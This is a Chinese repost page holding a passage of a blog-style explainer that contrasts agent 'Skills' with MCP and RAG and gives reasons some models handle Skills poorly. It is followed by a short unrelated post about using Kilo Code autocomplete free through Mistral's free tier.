    5. 核心辨析:Skills vs MCP vs RAG

    在 Agent 的架构中,很多人容易混淆这三个概念。其实它们构成了智能体的 “能力铁三角”

    概念本质人体比喻作用
    RAG数据 (Data)记忆 / 书本告诉 AI 它不知道的事实(如公司规章、私有文档)。
    MCP接口 (I/O)手和脚让 AI 连接外部世界(如读取数据库、操作 GitHub、发送 Slack)。
    Skills方法论 (Behavior)大脑皮层教 AI 处理问题的专业思维(如代码审计流程、苏格拉底教学法)。

    一句话总结它们的关系:

    一个强大的 Agent,会用 Skills (专业思维) 去指挥 MCP (手脚),并参考 RAG (记忆) 来完成任务。

    Skills 往往是那个指挥官。它定义了流程,而 MCP 是它调用的工具。

    6. 痛点:为什么有些模型 (如 GLM-4.7) 跑 Skills 效果不好?

    这其实是目前 Agent 开发中最大的坑:Skills 对模型是有门槛的。

    你可能会发现,同样的 Skill,在 gemini 3 flash 上跑得行云流水,但在 GLM-4.7 或 DeepSeek 上却经常 “卡壳” 或 “乱答”。

    这背后的原因主要有三点:

    A. Function Calling (工具调用) 的微调差异

    Skills 的触发依赖于模型输出极其精准的 JSON 格式 指令。

    • Claude/Gemini:经过了海量的 Tool Use 专项微调,它们知道什么时候该 “闭嘴去调工具”。

    • 普通模型:往往有 “抢答” 的毛病。它们看到了 Skill 的描述,却选择直接用自己的通用知识去回答用户,而不是去调用 Skills。

    B. System Prompt 的权重问题

    Skills 的指令通常是写在 System Prompt 里的。

    有些模型在训练时,过分强调了 User Prompt (用户输入) 的权重,导致它忽略了 System Prompt 里的设定。

    结果就是:你明明加载了 “资深架构师” 的 Skill,它却还是像个 “普通客服” 一样回答你。

    这也就是为什么在国内模型中需要设定很严格的提示词规则!!!

    C. 复杂推理链 (Reasoning Chain) 的断裂

    执行一个 Skill 往往需要多步操作(思考 → 选工具 → 看结果 → 再思考)。

    很多模型在第一步之后就 “累” 了,或者丢失了上下文,导致 Skill 执行到一半就中断了。

    结论:Skills 是一种高级玩法,它需要 Agentic Model (代理级模型) 的支持,而不仅仅是 Chat Model (聊天模型),并且要上下文够长才能支持的更好。

    6. Skills 是如何跑起来的?

    这个模式的成功,依赖于现代 LLM (大语言模型) 进化出的两个通用素质:

    A. Tool Use / Intent Recognition (意图识别能力)

    这是 Skills 的开关

    模型必须具备一种元能力:不仅仅是 “回答问题”,而是能 “判断该用什么方法回答问题”。

    当模型意识到:“用户的问题超出了我的通用知识,我需要激活 python-architect 这个专业模块” 时,Skill 就被触发了。

    B. Long Context / In-Context Learning (上下文学习能力)

    这是 Skills 的容器

    当 Skill 被激活时,系统会瞬间将几千字甚至上万字的专业指令(即那个封装好的 Prompt)注入到对话流中。

    模型必须有足够大的容量来接纳这些新规则,并立即改变自己的行为模式。

    7. 最后的最后

    Skills 是 Prompt Engineering (提示词工程) 走向 Software Engineering (软件工程) 的必然产物。

    它解决了 AI 应用开发中的一个根本矛盾:通用性与专业性的矛盾

    我们不需要一个在每一秒都精通所有领域的臃肿 AI。

    我们需要的是一个灵活的调度器,它能根据你的需求,在毫秒级的时间内,从口袋里掏出那个最正确的剧本(Skill),瞬间变身为那个领域的专家。

    这就是 Skills。

    它是流动的知识,是按需分配的智慧。 感谢各位观看!!!如果有用请多多评论!!!


    📌 转载信息
    原作者:
    Y_yuHou
    转载时间:
    2026/1/16 16:49:05

    早上收到一封 kilo code 邮件发现能免费自动补全了:

    Use Kilo Autocomplete for Free

    Mistral’s free tier gives you autocomplete at zero cost. Set it up in minutes and start getting inline suggestions without spending a dime.

    Setup guide →
    YouTube Tutorial →
    根据视频教程内容,需要去 mistral 网站注册,然后拿到 key,填进去就行了,不能再用收费的了。需要验证 phone number
    其他补全的插件 fitten 每次启动都要闪一下很烦。amp 启动太慢了有点卡


    📌 转载信息
    原作者:
    zhang00954
    转载时间:
    2026/1/16 16:48:35